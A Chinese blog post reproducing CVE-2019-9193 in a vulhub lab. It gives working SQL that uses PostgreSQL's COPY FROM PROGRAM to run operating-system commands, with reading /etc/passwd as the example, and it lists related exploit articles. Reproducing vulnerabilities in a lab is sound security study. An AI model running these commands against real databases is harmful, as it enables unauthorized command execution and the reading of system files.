CVE-2019-9193(高权限远程命令执行漏洞)vulhub复现

已于 2023-05-17 11:51:08 修改
阅读量542 收藏 1
点赞数 1
文章标签: 安全 数据库 web安全
于 2023-05-17 11:48:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52279315/article/details/130722456
版权

影响版本 9.3-11.2

这个漏洞是因为PG的9.3版本之后Postgres新增了一个COPY TO/FROM PROGRAM命令,这个命令允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令,也就是说即使不是超级用户也有可能实现任意命令执行。(要么是超级用户要么是pg_read_server_files组中的用户)。

 使用超级用户去复现该漏洞

 我们需要进行的操作,也是该漏洞可以执行的POC

#如果表存在则进行删除,表名(cmd_exec)可以用其它的名称(该步骤可省略)
DROP TABLE IF EXISTS cmd_exec;
 
#创建一张表名,列名(cmd_output)可以用其它的名称
CREATE TABLE cmd_exec(cmd_output text);
 
#用开始提到的COPY执行命令,cmd_exec是保存命令执行后的内容,poc处输入我们需要执行的命令,例如(cat /etc/passwd)
COPY cmd_exec FROM PROGRAM 'poc';
 
#查看cmd_exec命令执行后保存的内容  
SELECT * FROM cmd_exec;

发现我们执行了我们的POC,然后成功读取到了/etc/passwd

为你效果
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub】PostGresql权限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 816
CVE-2019-9193
CVECVE-2019-9193:PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3529
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
PostgreSQL 权限命令执行漏洞CVE-2019-9193复现
技术超强的网络安全平台
08-01 354
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 进入目录
CVE-20199193所谓的psql的提权漏洞
公众号shadow sock7
03-27 1250
来源:https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 翻译:https://nosec.org/home/detail/2368.html 描述 PostgreSQL 从9.3到最新的11.2版本默认开启,影响L...
CVE-2019-9193)PostgreSQL 权限命令执行漏洞复现
最新发布
m0_69801663的博客
12-23 1103
CVE-2019-9193)PostgreSQL 权限命令执行漏洞
PostgreSQL 权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1752
#PostgreSQL 权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
HTTP/2 资源管理错误漏洞(CVE-2019-9513)脆弱性分析报表修复
懂哥的博客
03-12 2万+
一、概述 nginx 1.16.1 稳定版和 nginx 1.17.3 主线版发布 修复安全问题 nginx 1.17.3 安全:当使用 HTTP/2 时,客户端可能会导致过多的内存消耗和 CPU 使用 (CVE-2019-9511, CVE-2019-9513, CVE-2019-9516) Bugfix:使用 gzipping 时 "zero size buf" 警告可能会出现在日志中...
十九、docker学习-Dockerfile
杨村的博客
08-09 683
命令用于使用 Dockerfile 创建镜像。# 语法 docker build [ OPTIONS ] PATH | URL | -# 不指定dockerfile路径,默认使用当前路径下dockerfile文件 docker build -t mysql:5.7.31-zh .
PostgreSQL 权限命令执行漏洞CVE-2019-9193
EC_Carrot的博客
07-21 435
漏洞简介 PostgreSQL是PostgreSQL组织的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3至11.2版本中的导入导出数据命令‘COPY TO/FROM PROGRAM’存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令漏洞复现 我使用的是vulhub的环境,默认账号密码为postgres/postgres 登陆PostgreSQL:psql --host y
LINUX提权之第三方服务提权篇
程序员阿飘 的博客
01-11 248
上一篇文章讲了一下环境变量提权不知道大家学习的怎么样了,今天给大家带来新的提权知识——"第三方服务提权",本文会深入浅出讲解一下第三方服务提权的原理以及例子。总结了一下第三方服务器提权,相比于其他提权方法还是挺简单的,只需要找到对应第三方服务的漏洞即可尝试提权,当然我们也可以在MSF里找到对应的payload,仔细学习一下还是挺好理解的,本文就讲到这里,喜欢的话不妨一键三连。「金石计划 . 瓜分6万现金大奖」
修复CVE-2019-3862漏洞
发现美的眼睛
05-11 2610
修复CVE-2019-3862漏洞 这个漏洞来自于libssh2中的,发现者是国外团队,在发现之初就已经提交上去。在公布漏洞时,该漏洞已经被修复修复方式采用更新。 修复时,博客主查看了一下阿里云安全中心的修复方案和网上其它博客主的修复方案,都是使用yum对curl的更新。 # 如果yum update要使用的话,请注意linux内核也有可能会被更新 yum update # 更新curl命令,这篇博客文章发布时,修复漏洞的新版本是7.29.0 yum update curl # 查看一下当前
数据库提权
weixin_43873557的博客
02-10 900
01. Mysql提权 Mysql提权一 user defined function,用户定义函数,为用户提供了一种效创建函数的方式攻击者编写调用系统cmd命令(linux下相当于调用shell命令)的udf.dll文件,并将udf.dll导出到指定目录下,攻击者创建一个指向udf.dll的自定义函数func,每次在数据库查询中执行func函数等价于在cmd命令执行命令。 Windows2003:C:\windows MySQL 5.1版本后:mysql安装目录\lib\plugin\目录下 在MySQ
CVE-2019-0708 补丁下载地址与漏洞修复办法
热门推荐
网站安全专家
05-17 4万+
Windows系列服务器于2019年5月15号,被爆出漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 目前国内使用windows服务器的公司,以及网站...
CVE-2019-0708:Windows远程桌面UAF漏洞分析与复现
CVE-2019-0708是一个远程代码执行漏洞,微软在2019年5月发布了紧急补丁来修复这个问题。该漏洞可能影响到包括Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows Server 2003和Windows XP在内的旧版...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值